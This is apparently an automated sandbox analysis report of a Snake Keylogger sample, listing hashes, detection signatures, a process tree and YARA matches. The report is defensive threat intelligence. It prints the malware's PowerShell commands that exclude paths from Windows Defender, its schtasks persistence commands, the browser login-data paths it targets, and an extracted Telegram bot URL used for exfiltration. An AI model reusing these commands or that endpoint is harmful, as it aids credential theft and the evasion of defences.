Edit tour

Windows Analysis Report
rPO0977-6745.exe

Overview

General Information

Sample name:	rPO0977-6745.exe
Analysis ID:	1480082
MD5:	978148253c4b65b751fcd3cb4713f614
SHA1:	cbd9c5fee022b52a38abdedd536d22310f1b0870
SHA256:	c45dce6c441601cf7fd1c78d7697b3f3a5b1d27041417eb0ca7f26e98ccf1de9
Tags:	exeSnakeKeylogger
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

rPO0977-6745.exe (PID: 1540 cmdline: "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: 978148253C4B65B751FCD3CB4713F614)

powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6668 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rPO0977-6745.exe (PID: 2780 cmdline: "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: 978148253C4B65B751FCD3CB4713F614)

rPO0977-6745.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: 978148253C4B65B751FCD3CB4713F614)

EDyxAgkldisLe.exe (PID: 7276 cmdline: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe MD5: 978148253C4B65B751FCD3CB4713F614)

schtasks.exe (PID: 7928 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EDyxAgkldisLe.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" MD5: 978148253C4B65B751FCD3CB4713F614)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage?chat_id=5535403842"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14784:$a1: get_encryptedPassword 0x14a70:$a2: get_encryptedUsername 0x14590:$a3: get_timePasswordChanged 0x1468b:$a4: get_passwordField 0x1479a:$a5: set_encryptedPassword 0x15de7:$a7: get_logins 0x15d4a:$a10: KeyLoggerEventArgs 0x159b5:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19802:$x1: $%SMTPDV$ 0x181d4:$x2: $#TheHashHere%& 0x197aa:$x3: %FTPDV$ 0x18174:$x4: $%TelegramDv$ 0x159b5:$x5: KeyLoggerEventArgs 0x15d4a:$x5: KeyLoggerEventArgs 0x197ce:$m2: Clipboard Logs ID 0x19a0c:$m2: Screenshot Logs ID 0x19b1c:$m2: keystroke Logs ID 0x19df6:$m3: SnakePW 0x199e4:$m4: \SnakeKeylogger\
0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ff4:$a1: get_encryptedPassword 0x35a14:$a1: get_encryptedPassword 0x56234:$a1: get_encryptedPassword 0x152e0:$a2: get_encryptedUsername 0x35d00:$a2: get_encryptedUsername 0x56520:$a2: get_encryptedUsername 0x14e00:$a3: get_timePasswordChanged 0x35820:$a3: get_timePasswordChanged 0x56040:$a3: get_timePasswordChanged 0x14efb:$a4: get_passwordField 0x3591b:$a4: get_passwordField 0x5613b:$a4: get_passwordField 0x1500a:$a5: set_encryptedPassword 0x35a2a:$a5: set_encryptedPassword 0x5624a:$a5: set_encryptedPassword 0x16657:$a7: get_logins 0x37077:$a7: get_logins 0x57897:$a7: get_logins 0x165ba:$a10: KeyLoggerEventArgs 0x36fda:$a10: KeyLoggerEventArgs 0x577fa:$a10: KeyLoggerEventArgs
00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a072:$x1: $%SMTPDV$ 0x3aa92:$x1: $%SMTPDV$ 0x5b2b2:$x1: $%SMTPDV$ 0x18a44:$x2: $#TheHashHere%& 0x39464:$x2: $#TheHashHere%& 0x59c84:$x2: $#TheHashHere%& 0x1a01a:$x3: %FTPDV$ 0x3aa3a:$x3: %FTPDV$ 0x5b25a:$x3: %FTPDV$ 0x189e4:$x4: $%TelegramDv$ 0x39404:$x4: $%TelegramDv$ 0x59c24:$x4: $%TelegramDv$ 0x16225:$x5: KeyLoggerEventArgs 0x165ba:$x5: KeyLoggerEventArgs 0x36c45:$x5: KeyLoggerEventArgs 0x36fda:$x5: KeyLoggerEventArgs 0x57465:$x5: KeyLoggerEventArgs 0x577fa:$x5: KeyLoggerEventArgs 0x1a03e:$m2: Clipboard Logs ID 0x1a27c:$m2: Screenshot Logs ID 0x1a38c:$m2: keystroke Logs ID
0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14dac:$a1: get_encryptedPassword 0x357cc:$a1: get_encryptedPassword 0x55fec:$a1: get_encryptedPassword 0x15098:$a2: get_encryptedUsername 0x35ab8:$a2: get_encryptedUsername 0x562d8:$a2: get_encryptedUsername 0x14bb8:$a3: get_timePasswordChanged 0x355d8:$a3: get_timePasswordChanged 0x55df8:$a3: get_timePasswordChanged 0x14cb3:$a4: get_passwordField 0x356d3:$a4: get_passwordField 0x55ef3:$a4: get_passwordField 0x14dc2:$a5: set_encryptedPassword 0x357e2:$a5: set_encryptedPassword 0x56002:$a5: set_encryptedPassword 0x1640f:$a7: get_logins 0x36e2f:$a7: get_logins 0x5764f:$a7: get_logins 0x16372:$a10: KeyLoggerEventArgs 0x36d92:$a10: KeyLoggerEventArgs 0x575b2:$a10: KeyLoggerEventArgs
0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19e2a:$x1: $%SMTPDV$ 0x3a84a:$x1: $%SMTPDV$ 0x5b06a:$x1: $%SMTPDV$ 0x187fc:$x2: $#TheHashHere%& 0x3921c:$x2: $#TheHashHere%& 0x59a3c:$x2: $#TheHashHere%& 0x19dd2:$x3: %FTPDV$ 0x3a7f2:$x3: %FTPDV$ 0x5b012:$x3: %FTPDV$ 0x1879c:$x4: $%TelegramDv$ 0x391bc:$x4: $%TelegramDv$ 0x599dc:$x4: $%TelegramDv$ 0x15fdd:$x5: KeyLoggerEventArgs 0x16372:$x5: KeyLoggerEventArgs 0x369fd:$x5: KeyLoggerEventArgs 0x36d92:$x5: KeyLoggerEventArgs 0x5721d:$x5: KeyLoggerEventArgs 0x575b2:$x5: KeyLoggerEventArgs 0x19df6:$m2: Clipboard Logs ID 0x1a034:$m2: Screenshot Logs ID 0x1a144:$m2: keystroke Logs ID
00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 1540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 1540	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 1540	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 1540	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x60db3:$a1: get_encryptedPassword 0x61095:$a2: get_encryptedUsername 0x60bc9:$a3: get_timePasswordChanged 0x60cc4:$a4: get_passwordField 0x60dc9:$a5: set_encryptedPassword 0x631bb:$a7: get_logins 0x6311e:$a10: KeyLoggerEventArgs 0x62d89:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: rPO0977-6745.exe PID: 1540	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x62d89:$x5: KeyLoggerEventArgs 0x6311e:$x5: KeyLoggerEventArgs 0x638e4:$x5: KeyLoggerEventArgs 0x63c45:$x5: KeyLoggerEventArgs 0x65545:$m2: Clipboard Logs ID 0x6564b:$m2: Screenshot Logs ID 0x656a1:$m2: keystroke Logs ID 0x657d6:$m3: SnakePW 0x65637:$m4: \SnakeKeylogger\
Process Memory Space: rPO0977-6745.exe PID: 2916	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 2916	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 2916	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rPO0977-6745.exe PID: 2916	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d29b:$a1: get_encryptedPassword 0x2d57d:$a2: get_encryptedUsername 0x2d0b1:$a3: get_timePasswordChanged 0x2d1ac:$a4: get_passwordField 0x2d2b1:$a5: set_encryptedPassword 0x2f6a3:$a7: get_logins 0x2f606:$a10: KeyLoggerEventArgs 0x2f271:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: rPO0977-6745.exe PID: 2916	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2f271:$x5: KeyLoggerEventArgs 0x2f606:$x5: KeyLoggerEventArgs 0x2fdcc:$x5: KeyLoggerEventArgs 0x3012d:$x5: KeyLoggerEventArgs 0x31a2d:$m2: Clipboard Logs ID 0x31b33:$m2: Screenshot Logs ID 0x31b89:$m2: keystroke Logs ID 0x14db7:$m3: SnakePW 0x274e6:$m3: SnakePW 0x31cbe:$m3: SnakePW 0x34800:$m3: SnakePW 0x349f5:$m3: SnakePW 0x34bec:$m3: SnakePW 0x5775c:$m3: SnakePW 0x57b30:$m3: SnakePW 0x57dcd:$m3: SnakePW 0x31b1f:$m4: \SnakeKeylogger\
Process Memory Space: EDyxAgkldisLe.exe PID: 7276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EDyxAgkldisLe.exe PID: 7276	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: EDyxAgkldisLe.exe PID: 7276	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4e6d4:$a1: get_encryptedPassword 0x4e9b6:$a2: get_encryptedUsername 0x4e4ea:$a3: get_timePasswordChanged 0x4e5e5:$a4: get_passwordField 0x4e6ea:$a5: set_encryptedPassword 0x50adc:$a7: get_logins 0x50a3f:$a10: KeyLoggerEventArgs 0x506aa:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: EDyxAgkldisLe.exe PID: 7276	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x506aa:$x5: KeyLoggerEventArgs 0x50a3f:$x5: KeyLoggerEventArgs 0x51205:$x5: KeyLoggerEventArgs 0x51566:$x5: KeyLoggerEventArgs 0x52e66:$m2: Clipboard Logs ID 0x52f6c:$m2: Screenshot Logs ID 0x52fc2:$m2: keystroke Logs ID 0x530f7:$m3: SnakePW 0x52f58:$m4: \SnakeKeylogger\
Process Memory Space: EDyxAgkldisLe.exe PID: 8004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EDyxAgkldisLe.exe PID: 8004	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: EDyxAgkldisLe.exe PID: 8004	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b84:$a1: get_encryptedPassword 0x12e70:$a2: get_encryptedUsername 0x12990:$a3: get_timePasswordChanged 0x12a8b:$a4: get_passwordField 0x12b9a:$a5: set_encryptedPassword 0x141e7:$a7: get_logins 0x1414a:$a10: KeyLoggerEventArgs 0x13db5:$a11: KeyLoggerEventArgsEventHandler
11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19822:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c55:$a4: \Orbitum\User Data\Default\Login Data 0x1ac94:$a5: \Kometa\User Data\Default\Login Data
11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13758:$s1: UnHook 0x1375f:$s2: SetHook 0x13767:$s3: CallNextHook 0x13774:$s4: _hook
11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c02:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17baa:$x3: %FTPDV$ 0x16574:$x4: $%TelegramDv$ 0x13db5:$x5: KeyLoggerEventArgs 0x1414a:$x5: KeyLoggerEventArgs 0x17bce:$m2: Clipboard Logs ID 0x17e0c:$m2: Screenshot Logs ID 0x17f1c:$m2: keystroke Logs ID 0x181f6:$m3: SnakePW 0x17de4:$m4: \SnakeKeylogger\
0.2.rPO0977-6745.exe.41f9670.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rPO0977-6745.exe.41f9670.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rPO0977-6745.exe.41f9670.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b84:$a1: get_encryptedPassword 0x12e70:$a2: get_encryptedUsername 0x12990:$a3: get_timePasswordChanged 0x12a8b:$a4: get_passwordField 0x12b9a:$a5: set_encryptedPassword 0x141e7:$a7: get_logins 0x1414a:$a10: KeyLoggerEventArgs 0x13db5:$a11: KeyLoggerEventArgsEventHandler
0.2.rPO0977-6745.exe.41f9670.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19822:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c55:$a4: \Orbitum\User Data\Default\Login Data 0x1ac94:$a5: \Kometa\User Data\Default\Login Data
0.2.rPO0977-6745.exe.41f9670.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13758:$s1: UnHook 0x1375f:$s2: SetHook 0x13767:$s3: CallNextHook 0x13774:$s4: _hook
0.2.rPO0977-6745.exe.41f9670.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c02:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17baa:$x3: %FTPDV$ 0x16574:$x4: $%TelegramDv$ 0x13db5:$x5: KeyLoggerEventArgs 0x1414a:$x5: KeyLoggerEventArgs 0x17bce:$m2: Clipboard Logs ID 0x17e0c:$m2: Screenshot Logs ID 0x17f1c:$m2: keystroke Logs ID 0x181f6:$m3: SnakePW 0x17de4:$m4: \SnakeKeylogger\
11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b84:$a1: get_encryptedPassword 0x12e70:$a2: get_encryptedUsername 0x12990:$a3: get_timePasswordChanged 0x12a8b:$a4: get_passwordField 0x12b9a:$a5: set_encryptedPassword 0x141e7:$a7: get_logins 0x1414a:$a10: KeyLoggerEventArgs 0x13db5:$a11: KeyLoggerEventArgsEventHandler
11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19822:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c55:$a4: \Orbitum\User Data\Default\Login Data 0x1ac94:$a5: \Kometa\User Data\Default\Login Data
11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13758:$s1: UnHook 0x1375f:$s2: SetHook 0x13767:$s3: CallNextHook 0x13774:$s4: _hook
11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c02:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17baa:$x3: %FTPDV$ 0x16574:$x4: $%TelegramDv$ 0x13db5:$x5: KeyLoggerEventArgs 0x1414a:$x5: KeyLoggerEventArgs 0x17bce:$m2: Clipboard Logs ID 0x17e0c:$m2: Screenshot Logs ID 0x17f1c:$m2: keystroke Logs ID 0x181f6:$m3: SnakePW 0x17de4:$m4: \SnakeKeylogger\
0.2.rPO0977-6745.exe.421a090.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rPO0977-6745.exe.421a090.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rPO0977-6745.exe.421a090.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b84:$a1: get_encryptedPassword 0x12e70:$a2: get_encryptedUsername 0x12990:$a3: get_timePasswordChanged 0x12a8b:$a4: get_passwordField 0x12b9a:$a5: set_encryptedPassword 0x141e7:$a7: get_logins 0x1414a:$a10: KeyLoggerEventArgs 0x13db5:$a11: KeyLoggerEventArgsEventHandler
0.2.rPO0977-6745.exe.421a090.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19822:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c55:$a4: \Orbitum\User Data\Default\Login Data 0x1ac94:$a5: \Kometa\User Data\Default\Login Data
0.2.rPO0977-6745.exe.421a090.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13758:$s1: UnHook 0x1375f:$s2: SetHook 0x13767:$s3: CallNextHook 0x13774:$s4: _hook
0.2.rPO0977-6745.exe.421a090.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c02:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17baa:$x3: %FTPDV$ 0x16574:$x4: $%TelegramDv$ 0x13db5:$x5: KeyLoggerEventArgs 0x1414a:$x5: KeyLoggerEventArgs 0x17bce:$m2: Clipboard Logs ID 0x17e0c:$m2: Screenshot Logs ID 0x17f1c:$m2: keystroke Logs ID 0x181f6:$m3: SnakePW 0x17de4:$m4: \SnakeKeylogger\
11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14984:$a1: get_encryptedPassword 0x351a4:$a1: get_encryptedPassword 0x14c70:$a2: get_encryptedUsername 0x35490:$a2: get_encryptedUsername 0x14790:$a3: get_timePasswordChanged 0x34fb0:$a3: get_timePasswordChanged 0x1488b:$a4: get_passwordField 0x350ab:$a4: get_passwordField 0x1499a:$a5: set_encryptedPassword 0x351ba:$a5: set_encryptedPassword 0x15fe7:$a7: get_logins 0x36807:$a7: get_logins 0x15f4a:$a10: KeyLoggerEventArgs 0x3676a:$a10: KeyLoggerEventArgs 0x15bb5:$a11: KeyLoggerEventArgsEventHandler 0x363d5:$a11: KeyLoggerEventArgsEventHandler
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b622:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be42:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba55:$a4: \Orbitum\User Data\Default\Login Data 0x3c275:$a4: \Orbitum\User Data\Default\Login Data 0x1ca94:$a5: \Kometa\User Data\Default\Login Data 0x3d2b4:$a5: \Kometa\User Data\Default\Login Data
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14984:$a1: get_encryptedPassword 0x351a4:$a1: get_encryptedPassword 0x14c70:$a2: get_encryptedUsername 0x35490:$a2: get_encryptedUsername 0x14790:$a3: get_timePasswordChanged 0x34fb0:$a3: get_timePasswordChanged 0x1488b:$a4: get_passwordField 0x350ab:$a4: get_passwordField 0x1499a:$a5: set_encryptedPassword 0x351ba:$a5: set_encryptedPassword 0x15fe7:$a7: get_logins 0x36807:$a7: get_logins 0x15f4a:$a10: KeyLoggerEventArgs 0x3676a:$a10: KeyLoggerEventArgs 0x15bb5:$a11: KeyLoggerEventArgsEventHandler 0x363d5:$a11: KeyLoggerEventArgsEventHandler
11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15558:$s1: UnHook 0x35d78:$s1: UnHook 0x1555f:$s2: SetHook 0x35d7f:$s2: SetHook 0x15567:$s3: CallNextHook 0x35d87:$s3: CallNextHook 0x15574:$s4: _hook 0x35d94:$s4: _hook
